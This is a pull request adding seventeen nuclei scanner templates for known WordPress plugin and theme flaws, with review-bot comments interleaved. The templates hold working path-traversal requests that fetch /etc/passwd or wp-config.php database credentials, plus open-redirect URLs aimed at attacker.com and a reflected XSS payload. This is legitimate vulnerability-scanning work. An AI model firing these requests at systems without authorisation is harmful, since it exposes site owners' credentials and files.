Merge pull request #3695 from DhiyaneshGeek/master

17 New WordPress Templates
patch-1
Prince Chaddha 2022-02-15 18:35:47 +05:30 committed by GitHub
commit 7bf3ac584c
17 changed files with 452 additions and 0 deletions


@ -0,0 +1,24 @@
id: candidate-application-lfi
info:
name: Candidate Application Form <= 1.3 - Unauthenticated Arbitrary File Download
author: dhiyaneshDK
severity: high
description: The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.
reference: https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
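Review bot: The regex matcher under `- type: regex` has no `part:` key, so it relies on nuclei's default body matching, whereas the word matchers in the sibling templates of this PR declare `part: body` explicitly; add `part: body` beneath `- type: regex` so the intent is visible and the files read alike (simple-image-manipulator-lfi has the same omission). `reference:` is a single plain scalar here while cherry-lfi and db-backup-lfi use a list; both forms are accepted, but one style across the PR keeps the templates diffable.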


@ -0,0 +1,29 @@
id: cherry-lfi
info:
name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
author: dhiyaneshDK
severity: high
description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
reference:
- https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
- https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
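Review bot: The `name` and `description` advertise an arbitrary file upload and download, but the only request in the template exercises the download path (`download-content.php?file=`) and nothing checks the upload side. Either narrow the wording, e.g. `name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download`, or state in the description that only the download vector is detected, so a reader does not assume the upload issue was verified by a match.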


@ -0,0 +1,27 @@
id: churchope-lfi
info:
name: ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)
author: dhiyaneshDK
severity: high
description: The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible.
reference: https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15
tags: wordpress,wp-theme,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: db-backup-lfi
info:
name: DB Backup <= 4.5 - Path Traversal File Access
author: dhiyaneshDK
severity: high
description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected.
reference:
- https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
- https://www.exploit-db.com/exploits/35378
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200


@ -0,0 +1,43 @@
id: elementorpage-open-redirect
info:
name: The Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect
author: dhiyaneshDk
severity: medium
description: The plugin did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an Open Redirect issue.
reference: https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d
tags: wordpress,redirect,wp-plugin,elementor,wp
requests:
- raw:
- |
GET /?author=1 HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
extractors:
- type: regex
part: body
name: username
internal: true
group: 1
regex:
- 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
- type: regex
part: header
name: username
internal: true
group: 1
regex:
- 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
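Review bot: The second raw request points the redirect at `attacker.com`, a real third-party-registered domain, and `redirects: true` makes the scanner follow it, so every run sends a request to that host; the other open-redirect templates in this PR use the RFC 2606 reserved `example.com` and leave redirects off. Replace both `http://attacker.com` values with `https://example.com` and change the matcher's `attacker\.com` to `example\.com`; the same third-party choice appears as google.com in newsletter-open-redirect and ninjaform-open-redirect. `redirects: true` also looks unnecessary: the matcher reads the `Location` header, and following the redirect presumably leaves the matcher with the final page's headers instead (confirm against nuclei's behaviour), while the first `/?author=1` request is already covered by the header-based `username` extractor when the redirect is not followed.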


@ -0,0 +1,20 @@
id: eventtickets-open-redirect
info:
name: Event Tickets < 5.2.2 - Open Redirect
author: dhiyaneshDk
severity: low
description: The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue
reference: https://wpscan.com/vulnerability/80b0682e-2c3b-441b-9628-6462368e5fc7
tags: wordpress,redirect,wp-plugin,eventtickets,wp
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -0,0 +1,28 @@
id: hb-audio-lfi
info:
name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
author: dhiyaneshDK
severity: high
reference: https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html
metadata:
google-dork: inurl:/wp-content/plugins/hb-audio-gallery-lite
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
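Review bot: The `info` block has no `description`, unlike every other template in this PR except sniplets-lfi, and the `name` omits the affected version although the referenced advisory title carries 1.0.0. Add a version to the name, e.g. `name: HB Audio Gallery Lite <= 1.0.0 - Arbitrary File Download` (the reference names only 1.0.0, so confirm whether later releases are affected), and a one-line description naming `audio-download.php` and its `file_path` parameter as the unsanitized input, as the sibling templates do for theirs.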


@ -0,0 +1,27 @@
id: hide-security-enhancer-lfi
info:
name: WP Hide Security Enhancer 1.3.9.2 - Arbitrary File Download Vulnerability
author: dhiyaneshDK
severity: high
description: WP Hide Security Enhancer version 1.3.9.2 or less is victim of an Arbitrary File Download vulnerability. This allows any visitor to download any file in our installation
reference: https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
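Review bot: The `name` says `1.3.9.2` while the description says `1.3.9.2 or less`; the other templates encode that range in the name (`<= 1.3`, `< 1.2.7`), so write `name: WP Hide Security Enhancer <= 1.3.9.2 - Arbitrary File Download`. The description's "any file in our installation" reads as copied from the vendor post; "any file in the WordPress installation" says the same without the first-person voice.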


@ -0,0 +1,24 @@
id: music-store-open-redirect
info:
name: Music Store <= 1.0.14 - Referer Header Open Redirect
author: dhiyaneshDk
severity: medium
description: The Music Store WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability.
reference:
- https://wpscan.com/vulnerability/d73f6575-eb86-480c-bde1-f8765870cdd1
- https://seclists.org/fulldisclosure/2015/Jul/113
tags: wordpress,redirect,wp-plugin,musicstore,wp
requests:
- raw:
- |
GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
Host: {{Hostname}}
Referer: https://example.com
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
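Review bot: The description reads "The Music Store WordPress eCommerce WordPress plugin", repeating the platform name. `description: The Music Store eCommerce WordPress plugin was affected by a Referer Header Open Redirect vulnerability.` says the same thing cleanly.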


@ -0,0 +1,20 @@
id: newsletter-open-redirect
info:
name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
author: dhiyaneshDk
severity: medium
description: The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
reference: https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
tags: wordpress,redirect,wp-plugin,newsletter,wp
requests:
- method: GET
path:
- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL3d3dy5nb29nbGUuY29t"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)google\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
part: header
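Review bot: In the matcher, `part: header` is placed after the `regex:` list, whereas every other header matcher in this PR puts `part` before `regex`; mapping order does not change the meaning, but a trailing key after a list is easy to misread as belonging to it. Move it up so the block reads `- type: regex` / `part: header` / `regex:`.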


@ -0,0 +1,30 @@
id: ninjaform-open-redirect
info:
name: Ninja Forms < 3.4.34 - Administrator Open Redirect
author: dhiyaneshDk
severity: medium
description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
reference: https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
tags: wordpress,redirect,wp-plugin,ninjaform,wp,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://google.com&action=nf_oauth_connect HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)google\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
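Review bot: The login request substitutes `{{username}}` and `{{password}}`, but nothing in `info` says the operator must supply them; the `authenticated` tag only hints at it. If they are absent the template posts the literal placeholders, the second request then runs without a session and, presumably, the matcher never fires, so the failure is silent. Add a sentence to the description such as `Requires valid WordPress credentials supplied as the username and password template variables.` so the prerequisite is visible where users read it.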


@ -0,0 +1,22 @@
id: noptin-open-redirect
info:
name: Noptin < 1.6.5 - Open Redirect
author: dhiyaneshDk
severity: low
description: The plugin does not validate the to parameter before redirecting the user to its given value, leading to an open redirect issue
reference:
- https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c
- https://plugins.trac.wordpress.org/changeset/2639592
tags: wordpress,redirect,wp-plugin,noptin,wp
requests:
- method: GET
path:
- "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' #https://regex101.com/r/ZDYhFh/1
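Review bot: The inline comment on the regex line is written `#https://regex101.com/r/ZDYhFh/1` with no space after `#`; yamllint's `comments` rule flags this, and the other templates in the PR write the same comment as `# https://regex101.com/r/ZDYhFh/1`. Change it to match.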


@ -0,0 +1,29 @@
id: shortcode-lfi
info:
name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3)
author: dhiyaneshDK
severity: high
description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected.
reference: https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
metadata:
google-dork: inurl:wp/wp-content/force-download.php
tags: wordpress,wp-plugin,lfi,shortcode,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
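Review bot: The `name` and `description` give version 0.2.3, but the only reference is titled "WordPress ShortCode 1.1 Local File Inclusion", and the dork `inurl:wp/wp-content/force-download.php` carries a `wp/` prefix that the request path `/wp-content/force-download.php` does not; at least one of these looks like a copy-paste mismatch. The request also targets a file directly under `wp-content` rather than under `wp-content/plugins/<slug>/`, which may be what the advisory shows but is worth confirming. Check the affected plugin and version against the advisory and make `name`, `description`, `metadata.google-dork` and `path` agree, e.g. `google-dork: inurl:/wp-content/force-download.php`.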


@ -0,0 +1,24 @@
id: simple-image-manipulator-lfi
info:
name: Simple Image Manipulator v1.0 - Remote file download
author: dhiyaneshDK
severity: high
description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location.
reference: https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
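Review bot: The request path contains a literal `./` segment, `/wp-content/plugins/./simple-image-manipulator/controller/download.php`, which appears copied from the advisory's relative notation that the description also uses. Some servers collapse the segment and others will not, so the template should send the canonical URL: `- '{{BaseURL}}/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=/etc/passwd'`.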


@ -0,0 +1,26 @@
id: sniplets-lfi
info:
name: Wordpress Plugin Sniplets 1.1.2 - LFI
author: dhiyaneshDK
severity: high
reference: https://www.exploit-db.com/exploits/5194
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
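Review bot: This template has no `description`, while its sibling sniplets-xss, which cites the same exploit-db reference, has one; add a line naming the `libpath` parameter of `modules/syntax_highlight.php` as the unsanitized input, e.g. `description: The Sniplets plugin's syntax_highlight.php does not sanitize the libpath parameter, allowing local file inclusion.` The advisory is the only source visible here, so confirm that the 1.1.2 version in `name` is what it reports.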


@ -0,0 +1,30 @@
id: sniplets-xss
info:
name: Wordpress Plugin Sniplets - XSS
author: dhiyaneshDK
severity: medium
description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
reference: https://www.exploit-db.com/exploits/5194
tags: xss,wordpress,wp-plugin,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
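Review bot: `name` and `description` give no affected version, although sniplets-lfi, based on the same exploit-db entry, names 1.1.2; align them, e.g. `name: Wordpress Plugin Sniplets 1.1.2 - XSS`, and mention `view/sniplets/warning.php` and its `text` parameter in the description so the request is self-explanatory. The header word `text/html` is unquoted while the body word is double-quoted; quoting both keeps the style uniform.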


@ -0,0 +1,20 @@
id: webp-coverter-open-redirect
info:
name: WebP Converter for Media < 4.0.3 - Unauthenticated Open redirect
author: dhiyaneshDk
severity: medium
description: The plugin contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an Open Redirect issue.
reference: https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164
tags: wordpress,redirect,wp-plugin,webpconverter,wp
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
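Review bot: The `id` is `webp-coverter-open-redirect` ("coverter"), while the plugin, the `name` and the `webpconverter` tag all spell it converter; ids are what users reference when selecting or excluding templates and are awkward to rename once released, so fix it before merge: `id: webp-converter-open-redirect`.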